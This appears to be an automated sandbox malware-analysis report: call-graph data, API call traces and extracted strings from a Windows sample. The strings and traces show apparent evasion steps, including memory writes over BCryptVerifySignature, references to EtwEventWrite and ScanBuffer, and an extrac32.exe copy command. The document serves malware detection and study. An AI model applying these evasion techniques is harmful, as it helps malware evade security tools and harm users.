53348->53353 53354 2c71e24 53348->53354 53352 2c71fec 53349->53352 53357 2c71fac 53349->53357 53358 2c71f68 53349->53358 53355 2c71cd7 53350->53355 53359 2c71d2c 53353->53359 53360 2c71d48 53353->53360 53364 2c71dfc 53353->53364 53370 2c71e55 Sleep 53354->53370 53371 2c71e7c 53354->53371 53375 2c71e95 53354->53375 53378 2c71a8c 8 API calls 53355->53378 53383 2c71cfd 53355->53383 53361 2c71fb2 53357->53361 53365 2c71724 10 API calls 53357->53365 53362 2c71724 10 API calls 53358->53362 53366 2c71d79 Sleep 53360->53366 53373 2c71d9c 53360->53373 53379 2c71f82 53362->53379 53363 2c71724 10 API calls 53382 2c71f2c 53363->53382 53368 2c71724 10 API calls 53364->53368 53380 2c71fc1 53365->53380 53372 2c71d91 Sleep 53366->53372 53366->53373 53367 2c71ca1 53381 2c71cb9 53367->53381 53415 2c71a8c 53367->53415 53386 2c71e05 53368->53386 53369 2c71fa7 53370->53371 53374 2c71e6f Sleep 53370->53374 53371->53363 53371->53375 53372->53360 53374->53354 53377 2c71e1d 53378->53383 53379->53369 53384 2c71a8c 8 API calls 53379->53384 53380->53369 53387 2c71a8c 8 API calls 53380->53387 53382->53375 53385 2c71a8c 8 API calls 53382->53385 53384->53369 53388 2c71f50 53385->53388 53386->53377 53389 2c71a8c 8 API calls 53386->53389 53390 2c71fe4 53387->53390 53389->53377 53392 2c7173c 53391->53392 53393 2c71968 53391->53393 53402 2c717cb Sleep 53392->53402 53404 2c7174e 53392->53404 53394 2c71938 53393->53394 53395 2c71a80 53393->53395 53399 2c71947 Sleep 53394->53399 53408 2c71986 53394->53408 53396 2c71684 VirtualAlloc 53395->53396 53397 2c71a89 53395->53397 53400 2c716bf 53396->53400 53401 2c716af 53396->53401 53397->53367 53398 2c7175d 53398->53367 53405 2c7195d Sleep 53399->53405 53399->53408 53400->53367 53432 2c71644 53401->53432 53402->53404 53407 2c717e4 Sleep 53402->53407 53403 2c7182c 53414 2c71838 53403->53414 53438 2c715cc 53403->53438 53404->53398 53404->53403 53409 2c7180a Sleep 53404->53409 53405->53394 53407->53392 53410 2c715cc VirtualAlloc 53408->53410 53412 2c719a4 53408->53412 53409->53403 53411 2c71820 Sleep 53409->53411 53410->53412 53411->53404 53412->53367 53414->53367 53416 2c71aa1 53415->53416 53417 2c71b6c 53415->53417 53419 2c71aa7 53416->53419 53420 2c71b13 Sleep 53416->53420 53418 2c716e8 53417->53418 53417->53419 53422 2c71c66 53418->53422 53425 2c71644 2 API calls 53418->53425 53421 2c71ab0 53419->53421 53424 2c71b4b Sleep 53419->53424 53429 2c71b81 53419->53429 53420->53419 53423 2c71b2d Sleep 53420->53423 53421->53381 53422->53381 53423->53416 53426 2c71b61 Sleep 53424->53426 53424->53429 53427 2c716f5 VirtualFree 53425->53427 53426->53419 53428 2c7170d 53427->53428 53428->53381 53430 2c71c00 VirtualFree 53429->53430 53431 2c71ba4 53429->53431 53430->53381 53431->53381 53433 2c71681 53432->53433 53434 2c7164d 53432->53434 53433->53400 53434->53433 53435 2c7164f Sleep 53434->53435 53436 2c71664 53435->53436 53436->53433 53437 2c71668 Sleep 53436->53437 53437->53434 53442 2c71560 53438->53442 53440 2c715d4 VirtualAlloc 53441 2c715eb 53440->53441 53441->53414 53443 2c71500 53442->53443 53443->53440 53444 2d22165e 53445 2d221666 53444->53445 53446 2d221669 53444->53446 53447 2d2216a8 53446->53447 53449 2d221696 53446->53449 53452 2d2544ea 53447->53452 53451 2d2544ea new 23 API calls 53449->53451 53450 2d22169c 53451->53450 53454 2d2544ef 53452->53454 53455 2d25451b 53454->53455 53459 2d25bd51 53454->53459 53466 2d262f80 7 API calls new 53454->53466 53467 2d254c35 IsProcessorFeaturePresent RaiseException Concurrency::cancel_current_task __CxxThrowException@8 53454->53467 53468 2d25526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 53454->53468 53455->53450 53464 2d266137 _strftime 53459->53464 53460 2d266175 53470 2d2605dd 20 API calls _abort 53460->53470 53462 2d266160 RtlAllocateHeap 53463 2d266173 53462->53463 53462->53464 53463->53454 53464->53460 53464->53462 53469 2d262f80 7 API calls new 53464->53469 53466->53454 53467->53454 53469->53464 53470->53463 53471 2c70009 53474 2cb7000 53471->53474 53482 2cb7216 53474->53482 53476 2c70015 53477 2cb70c7 53477->53476 53489 2c97f44 timeSetEvent 53477->53489 53490 2c74168 53477->53490 53478 2cb700f 53478->53476 53478->53477 53485 2cb714d 53478->53485 53504 2cb73ad GetPEB 53482->53504 53484 2cb7222 53484->53478 53486 2cb716a 53485->53486 53487 2cb715d LoadLibraryA 53486->53487 53488 2cb71a0 53486->53488 53487->53486 53487->53488 53488->53477 53489->53476 53491 2c741ae 53490->53491 53492 2c74227 53491->53492 53494 2c743b8 53491->53494 53506 2c74100 53492->53506 53496 2c743e9 53494->53496 53499 2c743fa 53494->53499 53511 2c7432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 53496->53511 53498 2c743f3 53498->53499 53500 2c7443f FreeLibrary 53499->53500 53501 2c74463 53499->53501 53500->53499 53502 2c74472 ExitProcess 53501->53502 53503 2c7446c 53501->53503 53503->53502 53505 2cb73c0 53504->53505 53505->53484 53507 2c74110 53506->53507 53508 2c74143 53506->53508 53507->53508 53510 2c715cc VirtualAlloc 53507->53510 53512 2c75814 53507->53512 53508->53476 53510->53507 53511->53498 53513 2c75824 GetModuleFileNameA 53512->53513 53514 2c75840 53512->53514 53516 2c75a78 GetModuleFileNameA RegOpenKeyExA 53513->53516 53514->53507 53517 2c75afb 53516->53517 53518 2c75abb RegOpenKeyExA 53516->53518 53534 2c758b4 12 API calls 53517->53534 53518->53517 53519 2c75ad9 RegOpenKeyExA 53518->53519 53519->53517 53522 2c75b84 lstrcpynA GetThreadLocale GetLocaleInfoA 53519->53522 53521 2c75b20 RegQueryValueExA 53523 2c75b5e RegCloseKey 53521->53523 53524 2c75b40 RegQueryValueExA 53521->53524 53525 2c75c9e 53522->53525 53527 2c75bbb 53522->53527 53523->53514 53524->53523 53525->53514 53527->53525 53528 2c75bcb lstrlenA 53527->53528 53529 2c75be3 53528->53529 53529->53525 53530 2c75c30 53529->53530 53531 2c75c08 lstrcpynA LoadLibraryExA 53529->53531 53530->53525 53532 2c75c3a lstrcpynA LoadLibraryExA 53530->53532 53531->53530 53532->53525 53533 2c75c6c lstrcpynA LoadLibraryExA 53532->53533 53533->53525 53534->53521
                                                      APIs
                                                      • InetIsOffline.URL(00000000,00000000,02C97487,?,?,00000269,00000000,00000000), ref: 02C8D7C4
                                                        • Part of subcall function 02C87DF4: LoadLibraryW.KERNEL32(?,00000000,02C87EC3), ref: 02C87E24
                                                        • Part of subcall function 02C87DF4: GetModuleHandleW.KERNEL32(?,?,00000000,02C87EC3), ref: 02C87E2A
                                                        • Part of subcall function 02C87DF4: GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,02C87EC3), ref: 02C87E43
                                                        • Part of subcall function 02C77E08: GetFileAttributesA.KERNEL32(00000000,?,02C8E34C,ScanString,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,ScanString,02CAF358,02C974BC,UacScan,02CAF358,02C974BC,UacInitialize), ref: 02C77E13
                                                        • Part of subcall function 02C7C2DC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,02C8E67E,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,ScanBuffer,02CAF358,02C974BC,OpenSession), ref: 02C7C2F3
                                                        • Part of subcall function 02C8C7B8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02C8C888), ref: 02C8C7F3
                                                        • Part of subcall function 02C8C7B8: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02C8C888), ref: 02C8C823
                                                        • Part of subcall function 02C8C7B8: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02C8C838
                                                        • Part of subcall function 02C8C7B8: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02C8C864
                                                        • Part of subcall function 02C8C7B8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02C8C86D
                                                        • Part of subcall function 02C77E2C: GetFileAttributesA.KERNEL32(00000000,?,02C913E1,ScanString,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,ScanBuffer,02CAF358,02C974BC,ScanString), ref: 02C77E37
                                                        • Part of subcall function 02C77FC0: CreateDirectoryA.KERNEL32(00000000,00000000,?,02C915D2,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,Initialize,02CAF358,02C974BC,ScanString,02CAF358,02C974BC), ref: 02C77FCD
                                                      • WinExec.KERNEL32 ref: 02C92899
                                                        • Part of subcall function 02C8C6D4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02C8C7A6), ref: 02C8C713
                                                        • Part of subcall function 02C8C6D4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C8C74D
                                                        • Part of subcall function 02C8C6D4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02C8C77A
                                                        • Part of subcall function 02C8C6D4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02C8C783
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Path$Name$AttributesCloseCreateModuleName_$AddressDirectoryExecHandleInetInformationLibraryLoadOfflineOpenProcQueryReadWrite
                                                      • String ID: .url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$\ui$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                      • API String ID: 3167936576-1678658887
                                                      • Opcode ID: d60e6fa01e839499a03bda83b7b5e284657dad6cbb834444bed203fbc022e8ac
                                                      • Instruction ID: fda0be1fd00ac3be4d5878bf60a0ea1ff5f5f7c9b2be2f69d4cebc379e0261af
                                                      • Opcode Fuzzy Hash: d60e6fa01e839499a03bda83b7b5e284657dad6cbb834444bed203fbc022e8ac
                                                      • Instruction Fuzzy Hash: 9C040D75B901598FDB28EB64CD80ADEB3BAFF85304F1045E6E009A7255DB30AE99DF10

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 4397 2c944de-2c948cd call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c74898 4512 2c9510a-2c9528d call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c74898 4397->4512 4513 2c948d3-2c94ef2 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c72ee0 call 2c72f08 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 GetCurrentProcess call 2c87924 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 4397->4513 4602 2c95a5e-2c9714c call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 * 16 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 ExitProcess 4512->4602 4603 2c95293-2c952a2 call 2c74898 4512->4603 5041 2c94ef9-2c95105 call 2c749a4 call 2c8c898 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 EnumSystemLocalesA GetCurrentProcess call 2c87ca8 GetCurrentProcess call 2c87ca8 GetCurrentProcess call 2c87ca8 GetCurrentProcess call 2c87ca8 GetCurrentProcess call 2c87ca8 GetCurrentProcess call 2c87ca8 4513->5041 5042 2c94ef4-2c94ef7 4513->5042 4603->4602 4611 2c952a8-2c9557b call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c8d190 call 2c7480c call 2c7494c call 2c746a4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c77e08 4603->4611 4854 2c95858-2c95a59 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c749a4 call 2c88170 4611->4854 4855 2c95581-2c95853 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c8cde8 call 2c74500 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c74d8c * 2 call 2c74734 call 2c8c6d4 4611->4855 4854->4602 4855->4854 5041->4512 5042->5041
                                                      APIs
                                                        • Part of subcall function 02C87DF4: LoadLibraryW.KERNEL32(?,00000000,02C87EC3), ref: 02C87E24
                                                        • Part of subcall function 02C87DF4: GetModuleHandleW.KERNEL32(?,?,00000000,02C87EC3), ref: 02C87E2A
                                                        • Part of subcall function 02C87DF4: GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,02C87EC3), ref: 02C87E43
                                                        • Part of subcall function 02C72EE0: QueryPerformanceCounter.KERNEL32 ref: 02C72EE4
                                                      • GetCurrentProcess.KERNEL32(00000000,1DCD6500,00001000,00000040,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,UacScan,02CAF358,02C974BC,ScanBuffer,02CAF358,02C974BC), ref: 02C94D5B
                                                        • Part of subcall function 02C87924: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02C87931
                                                        • Part of subcall function 02C87924: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02C87937
                                                        • Part of subcall function 02C87924: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C87957
                                                      • EnumSystemLocalesA.C:\WINDOWS\SYSTEM32\KERNELBASE(2D220000,00000000,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,UacScan,02CAF358,02C974BC,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358), ref: 02C9508D
                                                      • GetCurrentProcess.KERNEL32(2D220000,00000000,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,UacScan,02CAF358,02C974BC,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358), ref: 02C95092
                                                      • GetCurrentProcess.KERNEL32(2D220000,00000000,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,UacScan,02CAF358,02C974BC,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358), ref: 02C950A6
                                                      • GetCurrentProcess.KERNEL32(2D220000,00000000,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,UacScan,02CAF358,02C974BC,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358), ref: 02C950BA
                                                        • Part of subcall function 02C87CA8: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02CAF384,02C8998C,ScanString,02CAF384,02C89CD0,ScanBuffer,02CAF384,02C89CD0,Initialize,02CAF384,02C89CD0,UacScan), ref: 02C87CBC
                                                        • Part of subcall function 02C87CA8: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02CAF384,02C8998C,ScanString,02CAF384,02C89CD0,ScanBuffer,02CAF384,02C89CD0,Initialize,02CAF384), ref: 02C87CD6
                                                        • Part of subcall function 02C87CA8: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,02CAF368,00000001,02CAF374,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02CAF384,02C8998C,ScanString,02CAF384,02C89CD0), ref: 02C87CFC
                                                        • Part of subcall function 02C87CA8: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02CAF384,02C8998C,ScanString,02CAF384,02C89CD0,ScanBuffer,02CAF384,02C89CD0,Initialize), ref: 02C87D12
                                                      • GetCurrentProcess.KERNEL32(2D220000,00000000,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,UacScan,02CAF358,02C974BC,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358), ref: 02C950CE
                                                      • GetCurrentProcess.KERNEL32(2D220000,00000000,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,UacScan,02CAF358,02C974BC,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358), ref: 02C950E2
                                                      • GetCurrentProcess.KERNEL32(2D220000,00000000,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,UacScan,02CAF358,02C974BC,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358), ref: 02C950F6
                                                        • Part of subcall function 02C77E08: GetFileAttributesA.KERNEL32(00000000,?,02C8E34C,ScanString,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,ScanString,02CAF358,02C974BC,UacScan,02CAF358,02C974BC,UacInitialize), ref: 02C77E13
                                                        • Part of subcall function 02C8C6D4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02C8C7A6), ref: 02C8C713
                                                        • Part of subcall function 02C8C6D4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C8C74D
                                                        • Part of subcall function 02C8C6D4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02C8C77A
                                                        • Part of subcall function 02C8C6D4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02C8C783
                                                      • ExitProcess.KERNEL32(00000000,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,Initialize,02CAF358,02C974BC,ScanString,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC), ref: 02C9714C
                                                        • Part of subcall function 02C74C0C: SysFreeString.OLEAUT32(02C8D3D4), ref: 02C74C1A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$Current$AddressFileLibraryProc$FreeHandleLoadMemoryModulePathVirtualWrite$AllocateAttributesCloseCounterCreateEnumExitLocalesNameName_PerformanceQueryStringSystem
